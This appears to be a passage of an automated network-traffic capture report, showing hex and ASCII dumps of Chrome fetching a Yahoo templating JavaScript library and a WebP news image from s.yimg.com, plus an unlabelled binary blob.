                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 6a 81 33 88 76 e8 0c a6 a5 d0 8a 61 80 5e d8 53 4a 19 a0 16 11 02 17 32 c4 8d e2 aa ae e1 17 42 80 da 66 12 8d 26 b5 32 f5 4d 45 9c a9 ff 4f 41 b3 55 a8 30 09 0c bb 8d 05 6b 7d 5f 97 db 99 d8 4d 92 28 5a b4 d0 55 19 06 77 34 cf f0 35 1a a2 f0 b9 e2 bc 7a de 1e ea 1a 13 bd 7b b6 62 8d 66 44 60 9f 6a 62 34 7c 9f a9 60 ac be 4b 70 17 75 b8 a8 4f e0 f7 a0 1a c4 58 01 42 c1 36 a5 47 fe 85 4c 34 2e c8 1b 33 df b7 df e3 97 17 61 45 4d 01 a8 57 eb 0e 56 50 2a 17 bd ba 13 d5 e3 83 16 bf c6 13 7c 3e 19 d6 2e d3 05 44 fa 52 03 48 0d 47 89 0c 8c bb 92 80 1c 4f bb 3b 06 70 45 21 e3 82 b9 f7 a9 08 47 e8 5a 79 ad 00 03 27 64 02 de 1c 76 38 d7 ab fb 61 28 c2 f5 23 8b cc dd d9 3d 1e 43 24 34 0a a6 36 a5 76 6e cf fc 73 06 92 bd 75 0e 10 df f2 5d 23 4c f5 83 28 ec e2 ba 05
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: j3va^SJ2Bf&2MEOAU0k}_M(ZUw45z{bfD`jb4|`KpuOXB6GL4.3aEMWVP*|>.DRHGO;pE!GZy'dv8a(#=C$46vnsu]#L(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: da 9c 4d f7 a2 c6 fc 01 e8 93 c3 28 1b 0c 10 b1 6b 98 d7 13 f9 b7 3c 50 28 ae 67 5b 30 3d 33 47 49 a8 c6 8d 5f ca b5 cb 76 31 4d 3e e8 79 cf c0 b5 e3 af e9 2e 5f 29 f2 42 ef 2c fa d9 6f 7c f5 69 99 c9 36 cb 7c c3 1f 18 ae 75 59 c3 c5 99 94 97 36 5e e0 0d 48 28 41 2b a8 11 21 68 7b 93 96 33 8a 5c 2f e1 df 02 f0 b0 b4 26 12 03 ab b9 7c 62 7c 57 fa 71 c5 e1 f9 0c d8 02 b7 ce c1 1d e9 13 2e d6 8f fc 1b bb fa 3d e7 4c 0f 9f 6b 3c 01 45 b5 05 fa 8b b5 13 22 ef 7e 6e 81 fd 1e 58 b2 dd 78 10 fd 60 50 79 3b a5 3d 66 b9 46 a4 7f 1c 4c 89 36 44 7d b0 9a 0b d7 58 ac d9 20 a0 ed 3e 68 bc 1a 31 7e ad e4 c5 39 d5 59 9f c8 6a 16 88 7a 12 c7 2e 74 84 a8 56 c6 07 94 01 71 a8 7f 44 67 c5 ed 98 47 a5 45 f7 a2 05 64 36 18 ac c8 2c d2 8e 13 5c 1f bb b5 fc 40 74 32 ff 04 ae a4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: M(k<P(g[0=3GI_v1M>y._)B,o|i6|uY6^H(A+!h{3\/&|b|Wq.=Lk<E"~nXx`Py;=fFL6D}X >h1~9Yjz.tVqDgGEd6,\@t2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: c5 c8 8a 71 ca b5 1e 2e ee 58 f6 17 5e 68 eb e0 a7 f4 48 f3 06 27 f8 4b 67 d4 95 b5 57 9a 62 0a d8 90 41 af 9d 68 d1 72 ea 4d 63 8b 0f 76 c9 02 5f e2 e7 91 68 f1 3f 93 d9 cb 8a 44 56 78 09 d3 0b 57 fc 2d 2e 92 8e 9a c7 96 70 ed b3 19 96 0b 31 c3 94 a0 84 0d 02 7a 22 05 fb c2 6d e4 b1 bb f6 7b 8a a4 99 d1 18 ed d0 d6 53 ca 38 3f e1 c3 c5 fb 96 87 2e 03 94 42 a1 99 a7 51 40 e4 2b a5 19 62 a5 e1 b5 e2 4e 8a 00 74 3d c2 25 f7 e6 c4 83 12 22 9a f2 27 06 ad e7 ba 91 3a 48 69 b4 67 37 18 85 33 8e 2b a0 1f b5 66 09 33 fc 1b 09 5b 33 94 dd 1e e2 bf ad 38 7a 0b a4 50 50 2f 91 fe 6f 3f e7 4f 34 61 2b b4 94 e1 1b 90 27 2a 9f c8 69 58 dd 00 b4 a9 f0 df 02 51 6e 25 ef 71 85 f1 eb 0e 44 0e 4c 1d 0d 46 7e 2f 59 b8 80 ae 0f a1 90 31 9c 91 e4 d0 0e bf a8 8c 4d e1 26 da cc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: q.X^hH'KgWbAhrMcv_h?DVxW-.p1z"m{S8?.BQ@+bNt=%"':Hig73+f3[38zPP/o?O4a+'*iXQn%qDLF~/Y1M&
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 3a c3 e0 81 06 fd ba 35 eb 94 b3 f4 8b 32 99 bd c7 7f 2f 74 c8 27 2d e5 64 c0 9d 40 b6 f5 a3 af 4b 36 7a 21 0f 32 0f 00 5e 7a 86 a6 11 65 81 cf 90 3f 29 b0 71 12 aa 92 fa 70 ac 88 f7 9f a2 ad 43 7d 96 10 8c fd 8a 38 a3 e2 b8 5c 8f 7e 6c 62 8e 08 72 9a 75 6c a4 12 6a 7f 6e ad 70 16 e9 91 fb 8b 6c 4a 7c 05 62 88 36 52 78 64 0d 5c f1 e1 14 ca a1 6a fd f7 2f c6 41 38 92 29 13 55 c7 52 8b 20 f2 b6 01 82 f7 37 c4 e1 f7 bc af f0 30 87 0c 50 68 48 6b 53 57 4d ba 42 9b 9f 70 3e 66 ff 68 9c bf ff 05 a5 06 f3 3e 04 a1 7d 51 30 5d c7 42 70 72 c6 c5 08 39 5d 68 10 5b 0f f5 ad 7b ed 1b b9 b5 49 89 25 9f cd 1b 41 1f fb f6 36 ac 39 2c fd c6 91 b9 37 f6 26 38 c5 ae 0a 2c 60 e4 ec 46 62 41 c1 3e dd 78 2b 64 40 ba 98 20 1c 51 48 c2 ee 12 13 f7 65 87 fb 78 7e 51 9d 96 1d 89
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: :52/t'-d@K6z!2^ze?)qpC}8\~lbruljnplJ|b6Rxd\j/A8)UR 70PhHkSWMBp>fh>}Q0]Bpr9]h[{I%A69,7&8,`FbA>x+d@ QHex~Q
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 22 4c 6e a2 c5 a4 2b 52 cb 05 7d af 84 e5 b3 5e 57 8e f4 48 6d 40 29 34 6e 1d 37 3d 4f 68 4c 94 12 cb 27 6c f0 9c c9 ea 0f 98 a3 80 d5 1b 01 61 fa e8 72 41 26 cf f5 e9 6b 4b b4 70 8d 79 b3 98 87 04 e0 aa 32 12 f4 26 6a 89 55 80 85 f9 45 81 20 30 a4 08 7f 2d 0b 93 4b 2e 89 32 24 bb aa 9b 70 ea b7 87 3b 5e db 3c 4e 42 70 46 32 05 f2 3c 8d 55 6f 2b c2 62 cd 60 40 a2 52 29 ee 03 77 b2 c8 dc 28 b1 f0 85 d9 15 65 49 2d 1b 01 67 00 20 3e cc 87 3c 50 0e 53 f0 df ae ef 0d 6d 90 76 62 8f ef f9 c5 ec 9b ed e2 65 2f f3 b3 9f 16 e6 9b b7 15 04 d4 7e 4e 19 67 4a 50 d3 ad 6d 86 68 0d c0 33 d6 35 2b c7 4b da bb b5 5a 48 d0 e0 d2 d8 7d dd 8a c1 4f 3b 26 88 bf cc ed be 7e 5b d7 e4 c0 38 3f 7c 8b 46 bb ff f4 99 35 80 dc 50 18 45 9a bf 80 58 1c 33 1e 3a 5a 68 ef df 73 7b 1e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: "Ln+R}^WHm@)4n7=OhL'larA&kKpy2&jUE 0-K.2$p;^<NBpF2<Uo+b`@R)w(eI-g ><PSmvbe/~NgJPmh35+KZH}O;&~[8?|F5PEX3:Zhs{


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              140192.168.2.45116587.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC368OUTGET /aaq/wf/wf-template-1.4.3-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC763INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: Mjw5sICu0LycpjB1cXWD/JEFfZ9L9FI2JDWLVi2ITeO+1q9ODwKTwSx0d5qN6SSmHaf6Le2zqeC6eSHfMxfb4vxCgY20EiER
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: M70BYH98NQYX4TB9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Mon, 07 Oct 2024 06:05:21 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Wed, 21 Sep 2022 02:22:21 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "85070595d47a7cc86af31833110dc18a"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: h9L3Y9Rw_EkQ1yH8NskMO9BjqcI4jexa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 7907
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 133705
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 74 65 6d 70 6c 61 74 65 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 74 65 6d 70 6c 61 74 65 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-template",[],t):"object"==typeof exports?exports["wafer-template"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 20 74 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function i(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a cla
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 70 74 6f 72 28 74 2c 72 29 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 6f 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 61 3f 76 6f 69 64 20 30 3a 65 28 61 2c 72 2c 6e 29 7d 69 66 28 22 76 61 6c 75 65 22 69 6e 20 6f 29 72 65 74 75 72 6e 20 6f 2e 76 61 6c 75 65 3b 76 61 72 20 69 3d 6f 2e 67 65 74 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 69 29 72 65 74 75 72 6e 20 69 2e 63 61 6c 6c 28 6e 29 7d 2c 70 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2c 64 3d 70 2e 62 61 73 65 2c 76 3d 70 2e 63 6f 6e 73 74 61 6e 74 73 2c 6d 3d 70 2e 57 61 66 65 72 42 61 73 65 43 6c 61 73 73 2c 77 3d 70 2e 75 74 69 6c 73 2c 79 3d 77 2e 67 65 74 54 65 6d 70 6c 61 74 65 43 6f 6e 74 65 6e 74 2c 68 3d 77
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ptor(t,r);if(void 0===o){var a=Object.getPrototypeOf(t);return null===a?void 0:e(a,r,n)}if("value"in o)return o.value;var i=o.get;if(void 0!==i)return i.call(n)},p=window.wafer,d=p.base,v=p.constants,m=p.WaferBaseClass,w=p.utils,y=w.getTemplateContent,h=w
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 4c 69 73 74 65 6e 65 72 73 28 29 2c 66 7d 72 65 74 75 72 6e 20 61 28 74 2c 65 29 2c 75 28 74 2c 5b 7b 6b 65 79 3a 22 72 65 6e 64 65 72 54 65 6d 70 6c 61 74 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 74 68 69 73 2e 5f 75 74 69 6c 2c 6e 3d 72 2e 61 6c 6c 6f 77 52 65 72 65 6e 64 65 72 2c 6f 3d 72 2e 65 6c 65 6d 2c 61 3d 72 2e 73 75 63 63 65 73 73 43 6c 61 73 73 2c 69 3d 72 2e 74 61 72 67 65 74 53 65 6c 65 63 74 6f 72 2c 73 3d 72 2e 74 65 6d 70 6c 61 74 65 54 65 78 74 2c 6c 3d 72 2e 74 65 6d 70 6c 61 74 65 49 64 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 72 2c 63 29 7b 76 61 72 20 75 3d 69 3f 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 69 29 3a 6f 3b 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Listeners(),f}return a(t,e),u(t,[{key:"renderTemplate",value:function(e){var r=this._util,n=r.allowRerender,o=r.elem,a=r.successClass,i=r.targetSelector,s=r.templateText,l=r.templateId;return new Promise(function(r,c){var u=i?document.querySelector(i):o;o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 66 65 72 2e 6f 6e 28 72 2c 65 2e 6f 6e 57 61 66 65 72 45 76 65 6e 74 29 3b 61 26 26 66 28 74 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 2e 70 72 6f 74 6f 74 79 70 65 29 2c 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 22 2c 65 29 2e 63 61 6c 6c 28 65 29 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 63 6c 69 63 6b 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 2d 31 21 3d 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 65 76 65 6e 74 73 2e 69 6e 64 65 78 4f 66 28 22 63 6c 69 63 6b 22 29 26 26 74 68 69 73 2e 72 65 6e 64 65 72 54 65 6d 70 6c 61 74 65 28 22 63 6c 69 63 6b 22 29 2e 63 61 74 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 6f 6e 57
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: fer.on(r,e.onWaferEvent);a&&f(t.prototype.__proto__||Object.getPrototypeOf(t.prototype),"addEventListeners",e).call(e)})}},{key:"click",value:function(){-1!==this._util.events.indexOf("click")&&this.renderTemplate("click").catch(function(e){})}},{key:"onW
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 74 65 72 22 5d 5d 2c 6d 6f 75 73 65 6c 65 61 76 65 3a 5b 5b 22 5f 73 65 6c 66 22 2c 22 6d 6f 75 73 65 6c 65 61 76 65 22 5d 5d 7d 3b 76 61 72 20 54 3d 4f 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 76 61 72 20 6e 3d 74 5b 72 5d 3b 6e 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 6e 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 6e 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 6e 26 26 28 6e 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e 2e 6b 65 79 2c 6e 29 7d 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ter"]],mouseleave:[["_self","mouseleave"]]};var T=O,k=function(){function e(e,t){for(var r=0;r<t.length;r++){var n=t[r];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(t,r,n){r
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC107INData Raw: 6d 70 6c 61 74 65 28 22 76 69 65 77 70 6f 72 74 22 29 2e 63 61 74 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 7d 29 7d 29 7d 7d 5d 29 2c 74 7d 28 57 29 2c 41 3d 52 3b 74 2e 64 65 66 61 75 6c 74 3d 6e 65 77 20 41 28 7b 73 65 6c 65 63 74 6f 72 3a 22 2e 77 61 66 65 72 2d 74 65 6d 70 6c 61 74 65 22 7d 29 7d 7d 29 7d 29 3b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: mplate("viewport").catch(function(e){})})}}]),t}(W),A=R;t.default=new A({selector:".wafer-template"})}})});


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              141192.168.2.45116387.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC740OUTGET /uu/api/res/1.2/ZrkpfMFDMT6.TViJfgbzxA--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/ap.org/5297d6de4533c99afa9d186dfe51efc1.cf.webp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1194INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 23978
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="5297d6de4533c99afa9d186dfe51efc1.webp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Etag: "3391e4aef637370b5bb0e21c973c54b5"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Expiration: expiry-date="Mon, 07 Apr 2025 00:00:00 GMT", rule-id="delete fetch for mysterio after 180 days"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 08 Oct 2024 16:43:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 17:08:14 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server-Timing: cld-fastly;mitm=po;dur=2;cpu=1;start=2024-10-08T17:08:14.119Z;desc=hit,rtt;dur=93,content-info;desc="width=536,height=284,bytes=23978,owidth=3908,oheight=2606,obytes=5865681,ef=(1,13,17,23,30)"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Disposition,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-request-id: 9261a48a9dad1dee69ce38cb84b1f51f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 7531
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cld_id: 9261a48a9dad1dee69ce38cb84b1f51f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-image-width: 536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-image-height: 284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 52 49 46 46 a2 5d 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 20 00 00 00 17 02 00 1b 01 00 49 43 43 50 30 02 00 00 00 00 02 30 41 44 42 45 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 d0 00 08 00 0b 00 13 00 33 00 3b 61 63 73 70 41 50 50 4c 00 00 00 00 6e 6f 6e 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 41 44 42 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 63 70 72 74 00 00 00 fc 00 00 00 32 64 65 73 63 00 00 01 30 00 00 00 6b 77 74 70 74 00 00 01 9c 00 00 00 14 62 6b 70 74 00 00 01 b0 00 00 00 14 72 54 52 43 00 00 01 c4 00 00 00 0e 67 54 52 43 00 00 01 d4 00 00 00 0e 62 54 52 43 00 00 01 e4 00 00 00 0e 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: RIFF]WEBPVP8X ICCP00ADBEmntrRGB XYZ 3;acspAPPLnone-ADBEcprt2desc0kwtptbkptrTRCgTRCbTRCr
